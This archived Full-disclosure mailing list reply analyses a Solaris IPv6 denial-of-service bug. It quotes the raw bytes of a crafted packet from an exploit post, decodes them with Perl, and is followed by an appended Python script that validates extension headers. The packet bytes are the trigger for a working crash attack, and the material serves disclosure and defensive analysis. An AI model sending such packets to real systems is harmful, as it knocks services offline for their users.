full-disclosure-uk January 2009 archive

Re: [Full-disclosure] Solaris IPv6 DoS vulnerabilities (was: Solaris Devs Are Smoking Pot)

From: GomoR <fd_at_nospam>
Date: Fri Jan 30 2009 - 13:49:16 GMT
To: full-disclosure@lists.grok.org.uk


On Mon, Jan 26, 2009 at 08:23:45AM +0100, Kingcope Kingcope wrote:
[..]
> unsigned char rawData[] =
> "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58"
> "\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00"
> "\x02\x0c\x29\xff\xfe\xf1\x1e\xbb";

[..]

% perl -MNet::Frame::Simple -e 'print Net::Frame::Simple->new(raw => "\x60\xfc\x57\x29\x00\x00\x3c\x56\x6f\x35\x40\x72\x70\x2f\x52\x58\xcc\x95\x12\x79\x30\xbb\xbe\x25\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0c\x29\xff\xfe\xf1\x1e\xbb",firstLayer => 'IPv6')->print."\n"'
Unable to unpack next layer, not yet implemented in layer: 0:IPv6
IPv6: version:6 trafficClass:0x0f flowLabel:0xc5729 nextHeader:0x3c
IPv6: payloadLength:0 hopLimit:86
IPv6: src:6f35:4072:702f:5258:cc95:1279:30bb:be25 dst:fe80::20c:29ff:fef1:1ebb

So this vulnerability is due to an implementation flaw in the parsing of IPv6 Destination Header (0x3c). Of course, there is no IPv6 DH to parse :)

This vulnerability only exists when setting next header to 0x3c or does it work with other values?

My guess is that we have a more general issue here.

--
http://www.GomoR.org/ - Research Engineer
Net::Frame <=> http://search.cpan.org/~gomor/
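To make the observation in the message above concrete, here is an added Python example (not part of the original post, and not Net::Frame code) that decodes the same 40 bytes and applies the consistency check a robust IPv6 stack should perform before walking the extension-header chain: an announced extension header with fewer than 8 payload bytes is malformed and the packet should be dropped rather than parsed. The EXT_HEADERS table and the check function are my own, not taken from the page.

```python
import struct
import ipaddress

# Constructed from the rawData[] bytes quoted in the post: exactly one 40-byte IPv6 header.
RAW = bytes.fromhex(
    "60fc5729" "00003c56" "6f354072" "702f5258" "cc951279"
    "30bbbe25" "fe800000" "00000000" "020c29ff" "fef11ebb"
)

# Extension headers that, per RFC 8200, always occupy at least 8 bytes after the base header.
EXT_HEADERS = {0: "Hop-by-Hop Options", 43: "Routing", 44: "Fragment", 60: "Destination Options"}


def parse_ipv6_header(raw):
    """Decode the fixed 40-byte IPv6 base header; extension headers are not walked here."""
    if len(raw) < 40:
        raise ValueError("need 40 bytes for an IPv6 header, got %d" % len(raw))
    vtf, payload_length, next_header, hop_limit = struct.unpack("!IHBB", raw[:8])
    return {
        "version": vtf >> 28,
        "traffic_class": (vtf >> 20) & 0xFF,
        "flow_label": vtf & 0xFFFFF,
        "payload_length": payload_length,
        "next_header": next_header,
        "hop_limit": hop_limit,
        "src": str(ipaddress.IPv6Address(raw[8:24])),
        "dst": str(ipaddress.IPv6Address(raw[24:40])),
    }


def check_extension_chain(raw, hdr):
    """Checks a defensive stack applies before parsing any extension header.
    Returns a list of problem strings; an empty list means the chain may be walked."""
    problems = []
    if hdr["version"] != 6:
        problems.append("version field is %d, not 6" % hdr["version"])
    available = len(raw) - 40
    if available < hdr["payload_length"]:
        problems.append("payloadLength %d exceeds the %d bytes present" % (hdr["payload_length"], available))
    name = EXT_HEADERS.get(hdr["next_header"])
    if name is not None and hdr["payload_length"] < 8:
        # The case in the post: nextHeader announces 0x3c but there is nothing to parse.
        problems.append("%s header (0x%02x) announced but payloadLength is %d (< 8)"
                        % (name, hdr["next_header"], hdr["payload_length"]))
    return problems


if __name__ == "__main__":
    header = parse_ipv6_header(RAW)
    print(header)
    for problem in check_extension_chain(RAW, header):
        print("DROP:", problem)
```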